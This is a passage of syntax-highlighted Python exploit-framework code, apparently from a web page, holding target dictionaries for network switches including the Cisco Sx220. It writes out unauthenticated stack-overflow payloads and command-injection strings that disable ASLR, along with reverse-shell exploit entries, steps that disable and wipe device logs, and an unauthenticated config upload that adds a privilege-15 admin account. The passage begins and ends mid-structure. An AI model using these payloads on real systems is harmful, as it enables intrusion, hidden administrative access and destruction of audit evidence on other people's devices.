					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">212</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">180</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;_CMD_&amp;login=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">212</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">180</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;LOGGING_SERVICE=0'</span><span class="token punctuation">,</span><span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean RAM log CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM log SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">212</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">180</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=+&amp;sntp_Port=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;login=1'</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Cisco'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Cisco Systems, Inc.'</span><span class="token punctuation">,</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'Sx220'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.cisco.com/c/en/us/support/switches/small-business-220-series-smart-plus-switches/tsd-products-support-series-home.html'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_main'</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'rsa'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=USERNAME&amp;password=PASSWORD&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_loginStatus'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_settings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;ram_sev_0=on&amp;ram_sev_1=on&amp;ram_sev_2=on&amp;ram_sev_3=on&amp;ram_sev_4=on&amp;ram_sev_5=on&amp;ram_sev_6=on&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=log_settings'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_fileClear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_ramClear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'httpuploadbakcfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "backup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadbakcfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/mnt/backup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/mnt/backup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadlang.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "language" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadlang.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># </span>
							<span class="token string">'content'</span><span class="token punctuation">:</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">30</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token comment"># We checking returned 'errMsgLangMG' and LEN of this text</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'errMsgLangMG'</span><span class="token punctuation">,</span>	<span class="token comment">#</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_saverun_cfg'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_uploadfail'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span> <span class="token comment"># Not the real content, its the result of invalid firmware (workaround)</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'login.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/VUL.TXT'</span><span class="token punctuation">,</span> <span class="token comment"># We cannot control the content...</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">32</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;password=/tmp/VUL.TXT&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'2'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=admin&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">312</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'md5'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token comment">#'encryption':'nopassword',</span>
						<span class="token comment">#'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" nopassword\n\n------', # Yep, working too</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;user=USERNAME&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=aaa_userDel'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntp'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntpDel'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
